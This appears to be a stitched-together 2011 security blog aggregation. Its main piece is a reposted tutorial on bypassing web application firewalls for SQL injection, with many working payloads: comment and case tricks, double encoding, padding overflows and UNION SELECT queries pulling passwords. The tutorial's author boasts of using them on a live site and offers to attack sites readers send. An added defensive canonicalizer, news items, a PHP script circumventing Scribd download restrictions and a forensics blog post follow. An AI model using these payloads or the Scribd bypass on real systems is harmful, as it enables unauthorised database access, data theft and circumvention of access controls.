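        result = extractors[proto](lines)
        if result and result.get("user"):
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in audit_streams(SAMPLE_STREAMS):
        print(finding)
```

The fix for all three is the same one the quoted texts give: carry the session over TLS (FTPS/SFTP, SMTP with STARTTLS or submission over TLS, HTTPS) so that an observer of the wire sees none of these lines.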

[Securityoverride] WAF Bypass: SQL injection(Forbidden or not?)


This is such a wide topic, but today we're going to examine WAF bypass and SQL injection. What is a WAF? A WAF is a Web Application Firewall used to filter certain malicious requests and/or keywords. Is a WAF a safe way to protect my website? Well, that's a tough question. A WAF alone will not protect your website if your code is vulnerable, but a WAF and secure coding will. A WAF should be used as a tool in your tool shed, but you should never count on a WAF to keep attackers out because most, if not all, WAFs can be bypassed with time and brains. Today, we will take a look into how exactly to do this.

1)Comments:
SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attacker's commands while commenting out the actual legitimate query. Some comments in SQL:

Code

  //, -- , /**/, #, --+, -- -, ;
 





2) Case Changing: Some WAFs will filter only lowercase attacks. As we can see, we can easily evade this by case changing:

Possible regex filter:
Code

   /union\sselect/g

Code

   id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)

3) Inline Comments: Some WAFs filter keywords like /union\sselect/ig. We can bypass this filter by using inline comments most of the time. More complex examples will require a more advanced approach, like adding SQL keywords that will further separate the two words:
Code

   id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point in /*!code*/: MySQL executes the contents of such a comment as part of the SQL statement.

Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can add more inline comments. For example, let's pretend a site filters union, where, table_name, table_schema, =, and information_schema. These are 3 statements we need in order to inject our target.
For this we would:
Code

   id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -

The above code would bypass the filter. Notice we can use "like" instead of "=".

Another way to use inline comments, when everything seems to fail, is to try to throw the application firewall off by crafting a SQL statement using variables:
Code

   id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- -

The above code should bypass the union+select filters even where common inline comments didn't work by themselves.

4) Buffer Overflow / Unexpected input:

A lot of WAFs are written in the C language, making them prone to overflows or to behaving differently when loaded with a large amount of data. Here is a WAF that does its job correctly, but when given a large amount of data allows the malicious request and response.
Code

   id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+


This bypass above works. I myself just used this against a Web site recently.

5) Replaced keywords (preg_replace and/or WAFs with the same action): Sometimes an application will remove all of a keyword. For instance, let's say we have a filter that replaces union select with whitespace. We could bypass that filter like so:

Code

   id=1+UNIunionON+SeLselectECT+1,2,3--

As you can see, once union+select has been removed our capital UNION+SELECT takes its place, successfully injecting our query:
Code

   UNION+SELECT+1,2,3--


6) Character encoding:
Most WAFs will decode and filter an application's input, but some WAFs only decode the input once, so double encoding can bypass certain filters: the WAF decodes the input once and then filters it, while the application keeps decoding the SQL statement and ends up executing our code.

Examples of double encoding:
Code

   id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+


Some examples of alternative encodings of the same characters are:
Code

   Single Quote '   %u0027  %u02b9  %u02bc  %u02c8  %u2032  %uff07  %c0%27  %c0%a7  %e0%80%a7
   White Space      %u0020  %uff00  %c0%20  %c0%a0  %e0%80%a0
   (                %u0028  %uff08  %c0%28  %c0%a8  %e0%80%a8
   )                %u0029  %uff09  %c0%29  %c0%a9  %e0%80%a9


7) Putting it all together: After bypassing a few WAFs the task gets easier and easier, but here are some ways to find out how to bypass "your" targeted WAF:

7a) Breaking the SQL statement: To find out exactly what's filtered you need to break your own SQL syntax and check for keywords being filtered, seeing if the keyword is filtered alone or in the presence of other SQL keywords. For instance, if union+select is giving you a Forbidden or an Internal Server Error, try removing union and seeing what happens with just select, and vice versa.

7b) Verbose Errors: When breaking the SQL syntax, you use the errors to guide you on what needs to be done. For instance, if we were injecting the broken syntax (union removed to stop the Forbidden errors):
Code

   id=1+Select+1,2,3--

And the error was something like:
Code

   Error at line 1 near \" \"+1,2,3--

We could gather that maybe the word Select is being filtered out and replaced with whitespace. We could confirm this by injecting something like:
Code

   sel%0bect+1,2,3

From there we would see if we get a Select error. If we did, a few more checks will give us the answer we need to bypass this WAF. This is just one of many ways to break down the SQL syntax. You may have to keep breaking it, while bypassing different parts.
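The defensive counterpart to sections 2, 3, 6 and 7b, as an added example (not code from the securityoverride post): a Python canonicalizer that repeatedly URL-decodes (bounded), resolves MySQL inline comments, collapses whitespace variants and folds case before matching, so each of the post's evasions reduces to the same string, shown beside the post's naive regex for comparison. The sample inputs are constructed, and the keyword-stripping helper is there only to show why stripping (section 5) is reversible.

```python
"""Canonicalize a parameter before matching: added defensive example, not code
from the securityoverride post. Assumes MySQL-style comment syntax."""
import re
from urllib.parse import unquote

# Section 2's filter as written: one case-sensitive regex on the raw bytes.
NAIVE_PATTERN = re.compile(r"union\sselect")

# What to refuse, matched only after canonicalization.
BLOCK_PATTERN = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")


def naive_filter_blocks(raw: str) -> bool:
    """The single-pass, case-sensitive check the post bypasses."""
    return NAIVE_PATTERN.search(raw) is not None


def canonicalize(raw: str, max_rounds: int = 4) -> str:
    """Reduce a parameter value to one normal form before any matching:
    bounded repeated URL-decoding (defeats double encoding), MySQL comment
    resolution (/*!...*/ keeps its body, /*...*/ is dropped), whitespace
    variants (tab, newline, %0b, %0c) collapsed to one space, case folded."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value.replace("+", " "))
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"\s+", " ", value)  # \s covers \t \n \r \x0b \x0c
    return value.strip().lower()


def is_union_injection(raw: str) -> bool:
    """Canonicalize first, then match; the request is rejected, never rewritten."""
    return BLOCK_PATTERN.search(canonicalize(raw)) is not None


def strip_keywords_once(value: str) -> str:
    """The weak response from section 5: delete keywords in a single pass.
    Kept here only to show that the sender can pre-split the keyword."""
    return re.sub(r"union|select", "", value, flags=re.I)


# Constructed inputs modelled on the post's payloads (not captured traffic).
SAMPLES = {
    "case":       "1+UnIoN/**/SeLeCT+1,2,3",
    "inline":     "1/*!UnIoN*/SeLeCT+1,2,3",
    "double_enc": "1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,3",
    "newline":    "1%0aunion%0d%0aselect%091,2,3",
    "benign":     "1 and name='union station select'",
}


def compare_filters(samples: dict = SAMPLES) -> dict:
    """Return {name: (naive_blocks, canonical_blocks)} for each sample."""
    return {k: (naive_filter_blocks(v), is_union_injection(v)) for k, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, canon) in compare_filters().items():
        print(f"{name:10s} naive={naive!s:5s} canonical={canon}")
    # Single-pass stripping re-assembles the keyword it was meant to remove.
    print(strip_keywords_once("UNIunionON SeLselectECT"))  # UNION SeLECT
```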

8) Advanced Bypassing Techniques: As stated earlier, once you have bypassed a few WAFs it gets easier and easier and more and more FUN :P When one finds himself running into a wall, try going through all the miscreant characters to see what's allowed and what's not allowed. These characters can be: [;:{}()*&$/|<>?"'] We can use these characters to possibly craft a working SQL exploit. For instance, during a WAF bypass I was doing, everything was being either filtered or replaced. I noticed that all * were being replaced with whitespace, which meant no inline comments. Union+select was also properly filtered to produce a Forbidden error. In this instance I was able to use the replaced * to craft my exploit like so:

Code

   id=1+uni*on+sel*ect+1,2,3--+

When the * were filtered out, the union+select fell right into place. Now, UNunionION+SELselectECT wasn't working because union and select were not being replaced, only * was. This is a common WAF bypass. Find the replaceable character and you find the exploit :)

Some other bypasses:
Code

   id=1+(UnIoN)+(SelECT)+
   id=1+(UnIoN+SeLeCT)+
   id=1+(UnI)(oN)+(SeL)(EcT)
   id=1+'UnI''On'+'SeL''ECT' <-MySQL only
   id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

As of MySQL 4.0 it is said that Uni/**/on+Sel/**/ect will not work for bypass, but if the application firewall was customized to filter /**/ out to whitespace it will work no matter what the version.

If anyone needs any help bypassing filters after reading and trying the above tactics please pm me with the website and I will give it a go. I love this shit!!!!!!!!!!!!!!! I know this isn't an exhaustive filter bypass tutorial, but using the above methods(and your brain) will help you bypass most WAF's today.


Enjoy!!


sources:
http://securityoverride.com/articles.php?article_id=95&article=WAF_Bypass:_SQL_injection%28Forbidden_or_not?%29

21 June 2011

[Document] Anonymous attacks Malaysia Government Sites


The 10 sites are:
  • http://www.warez-bb.org
  • http://thepiratebay.org
  • http://www.movie2k.to
  • http://www.megavideo.com
  • http://www.putlocker.com
  • http://www.depositfiles.com
  • http://www.duckload.com
  • http://www.fileserve.com
  • http://www.filestube.com
  • http://www.megaupload.com

Source: http://www.darknet.org.uk

[Document] Securelist - Spam in May 2011

 

May in figures

  • The amount of spam in email traffic increased by 2.1 percentage points compared to April and averaged 82.9%.
  • Phishing emails accounted for 0.02% of all mail traffic, a decrease of 0.01 percentage points compared to the previous month.
  • Malicious files were found in 4.1% of all emails, an increase of 0.45 percentage points compared to April’s figure (read more)
Source: http://www.securelist.com

[Document] AVG community powered threat report - Q2/2011




Mobile Malware
As anticipated in our last report, this year mobile malware is going to make the headlines. A lot of this may be explained by the massive and practically defenseless target posed by the exploding number of smart phones, tablets and other advanced mobile devices.
Gartner foresees that total sales of mobile communication devices to end users will reach ~413 million devices – this is an ‘attractive’ target for hackers.
Responding to this development, we noticed that cyber criminals are shifting more resources from PC to mobile. The current low security awareness among mobile users opens the door for cyber criminals to monetize quickly.
Additionally, there is no need to go through the evolution of malware development which was necessary for PC-targeted attacks: the knowledge and the tricks are already there. Cyber criminals just have to execute.
AVG Threat Labs have spotted various monetization methods criminals are using on mobile platforms, the most popular being Premium SMS. All they need to do is persuade a user to download an app that they think they need. When installed, it sends an SMS to a premium number to monetize that victim. Below is one example out of many we found this quarter.
China Mobile is considered the world's largest phone operator, with more than 70% of the Chinese domestic market and 518 million subscribers (source: Guardian.co.uk).
1. The chosen attack vector was a text message to China Mobile subscribers.
2. It used a phishing attack, disguised as coming from China Mobile, trying to lure users into believing that it came from 10086 and China Mobile. The message contained a link to a phishing site.
3. The cyber criminals used a domain name similar to the legitimate site, 1oo86.cn instead of the real 10086.cn (using the letter “O” instead of the digit zero), which is difficult for a novice user to notice.
4. When clicking on the link, an app was downloaded and the user would not suspect anything, because they expect that an update will be downloaded and installed. The attacker gets another advantage here – if the user sees nothing on their device, they forget about it and leave the malware untouched.
5. The criminals developed two variants, one for Android and one for Symbian OS.

6. When installed, it performs the following activities:
   a. It downloads a configuration file.
   b. It sends out device information (such as the IMEI number, phone model and SDK version).
   c. It writes to a log file.
   d. It allows remote control / monitoring of the device.
   e. It has an update mechanism.
The crown jewels of this piece of malware are the “premium SMS charges”. The malware sends text messages to premium rate numbers. Premium messaging is where a user is subscribed to receive content and is billed by a third party. The charges can be one-time or recurring. The subscription process is monitored by the cyber criminals.
The user is charged premium prices, and their phone bill increases. The malware can hide these activities from the user by not listing the sent/received text messages.
Up until now, the main tactic used by hackers has been uploading malicious applications to the Android Market. Google, for the second time in the past three months, had to remove dozens of malicious applications from the Google Market. Some of these apps were pirated legitimate programs that had been modified with malicious code and uploaded to the Google Market.
However, as seen by AVG Threat Labs lately, a phishing method is being used: text messages, instant messages or emails with content which tries to lure users into installing malware on their mobile. Cyber criminals are using social engineering tactics when targeting mobile users, as they do with PC users. Cyber criminals know they can be successful by targeting the weakest link in the chain, the human part! Social engineering attacks are more difficult to protect against.
As with the above example, the criminals’ mobile monetization is mainly coming via premium paid services such as SMS Trojans, which send text messages to premium rate numbers, or by applications that initiate calls to highly rated numbers.
Mobile malware has reached the sophistication and complexity of PC malware. Most mobile malware uses Command & Control to support and update the malware remotely. This is done to maximize the profit for the criminals. With the C&C, the attacker can monitor any activity performed on the mobile device.
Recommendations
•  Any mobile device should be equipped with security measures. 
•  AVG provides ‘AVG Mobilation’, free software for Android to protect users from such threats
•  Become security aware, expect being a target for criminal activity
•  Be cautious in what you download to your device.
•  Monitor your device activities
•  The most important task is… check your phone bills.

Source: http://avg.typepad.com/files/avg-community-powered-threat-report---q2-2011.pdf

[Found] Download for free from Scribd


<?php
// Builds a Scribd mobile download URL from a document link such as
// http://www.scribd.com/doc/<id>/<title> and redirects the browser to it.
function downloadScribd($link) {
    $parts = explode("/", str_replace("http://", "", $link));
    // The document ID is the third path element; accept digits only so the
    // value cannot break out of the JavaScript string below.
    if (!isset($parts[2]) || !ctype_digit($parts[2])) {
        exit("Invalid Scribd link");
    }
    $docID = $parts[2];
    exit("<script>window.location='http://www.scribd.com/mobile/documents/" . $docID
        . "/download?commit=Download+Now&secret_password=K4pT3N';</script>");
}

echo "<form name='f' method='post' action=''>
    <input type='text' name='link'>
    <input type='submit' name='submit' value='Download'>
    </form>";

if (isset($_POST['submit'])) {
    downloadScribd($_POST['link']);
}
?>
 
http://anambaskab.go.id/scribd.php
Source: http://explorecrew.org
All content of this web is for education purpose only. Any consequences in view of the use of scripts, techniques, codes, tutorials, and everything imaginable on this website are purely the responsibility of the user, NOT ExploreCrew. If you agree about this, continue reading. If you do not agree, please leave.

[RAT] Muhammad Nuh Al-Azhar

Muhammad Nuh Al-Azhar
I am a forensic cop who often deals with forensic investigation of computer crime and/or computer-related crime. I have been working at the Forensic Laboratory Centre (Puslabfor) of the Indonesian National Police Headquarters (Mabes Polri) for more than 14 years. With this blog, I would like to share the forensic knowledge I obtained from the CHFI (Computer Hacking Forensic Investigator) at EC-Council, USA and the MSc in Forensic Informatics at the University of Strathclyde, UK, and my experience in dealing with computer-based electronic evidence. Besides CHFI, I was also awarded the professional certification of CEI (Certified EC-Council Instructor) from EC-Council, a professional commendation as Senior Instructor on crime scene management from a retired forensic investigator of the New York State Police, and MBCS (Professional Member of the British Computer Society). I also received the 2010 Super Six UK Alumni award from British Council - Indonesia. In order to keep up to date with IT information and maintain professionalism, I have joined EC-Council, Forensic Focus, SANS and BCS (British Computer Society) as a member. I hope this blog could be useful for anybody who would like to develop forensic skills.
In the last two weeks, I was requested by some parties to share knowledge on digital forensics at two different activities. The first was to be keynote speaker at the digital forensic preview seminar conducted by the EC-Council Representative for Indonesia (i.e. PT. Datamation) along with PT. Andalan Nusantara Teknologi. This seminar, carried out in Jakarta, was attended by about sixty people who are Chief Information Officers (CIO) or IT people from different organisations in Indonesia such as Bank Central Asia (BCA), Pertamina, Bina Nusantara University, the Indonesian Foreign Affairs Department and so on. The second was to be guest lecturer at the University of Indonesia. This is a program of the British Council (i.e. UK Alumni Road Show) performed jointly with the Criminology Department of the University of Indonesia. This class, moderated by Prof. Adrianus Meliala, was attended by about thirty students who actively followed the lecturing session.

On both occasions, I talked about the current development of digital forensics. Following are some of the core materials delivered:

Investigation flow chart
On this chart, it is explained that computer crime or computer-related crime is investigated in order to solve the case. This investigation is done by applying digital forensics properly. In this case, digital forensics plays some key roles, namely:
- To support and perform scientific crime investigation.
- To carry out forensic analysis on electronic evidence in order to find out digital evidence.
- To be able to describe the link between the perpetrators and their crime.
- To deliver expert testimony at court.


Digital forensic principles
These principles are adopted from the ACPO (i.e. Association of Chief Police Officers in the UK) guidelines. They are widely used by digital forensic practitioners around the world. In my point of view, a digital forensic analyst should understand these principles and has to apply them when performing a forensic investigation. Below are the principles quoted from the guidelines.
1. No action taken by law enforcement agencies should change data held on a computer or storage media.
2. The person accessing the data must be competent to do so and able to explain the relevance and implications of the actions taken.
3. An audit trail or record of all processes applied should be created and preserved.
4. The person in charge has overall responsibility to ensure that these principles are adhered to.

First actions at the scene
When a computer is off, following are some actions which should be taken:
1. Make sure it is switched off and never turn it on.
2. Remove the battery (for notebooks / mobile device) or unplug the end of the power cable attached at CPU first, and then from wall socket (for PCs).
3. For mobile device: if any, never remove SIM cards from the device.
4. Label, document and record it; and then seize it for further analysis.

When a computer is on, the actions would be:
1. Record what is running on the screen.
2. Collect data (e.g. running processes, opened ports, decrypted volumes, etc.). Ensure that changes made to the system are understood.
3. When possible, perform live forensic imaging.
4. Never use the shut down procedure of the OS.
5. Unplug the cable power from CPU first; and then from the wall socket (for PCs) or remove the battery (for notebooks / mobile).
6. Label, document and record it; and then seize it for further analysis.

Digital forensic components
These are components which should be well understood in order to perform digital forensic analysis properly.
1. Qualified Human Resource: Professional digital forensic analyst.
2. Forensic Procedure: Implementation of digital forensic principles.
3. Reliable Hardware: High speed processor, reasonable RAM, USB to IDE cable, write protect, etc.
4. Reliable Software: Forensic applications running under Microsoft Windows and Linux Ubuntu.
5. Management: Solution on budget and non-technical problems.


Digital forensic coverage
Based on the type of evidence analysed, digital forensics is divided into several categories, namely:
1. Computer Forensic.
2. Cyber & Network Forensic.
3. Mobile Forensic.
4. Audio Forensic.
5. Video & Digital Image Forensic.
6. CD/DVD Forensic.

Anti forensic
It is defined as techniques implemented by a perpetrator in order to counter digital forensics. The objectives of anti-forensics are:
1. To conceal the case-related information.
2. To obscure the criminal’s involvement.
3. To obstruct the action of digital forensic analyst.


The techniques of anti forensic which are frequently implemented are:
1. Cryptography. It is a method to conceal essential information by deploying cryptography algorithm.
2. Steganography. It is a method to conceal essential information by embedding it into a carrier, so that it is difficult to detect.
3. Wiping. It is a method for secure deletion by overwriting the sectors of the deleted target.

Those are several of the materials I delivered on both occasions. It is a pride for me to be a speaker or lecturer sharing my knowledge and experience on digital forensics with other people. I always look forward to receiving invitations like these programmes. Hopefully this could be useful for anybody or any organisations that would like to apply digital forensics to the investigation of computer crime or computer-related crime.

Good luck...!
Source: http://forensiccop.blogspot.com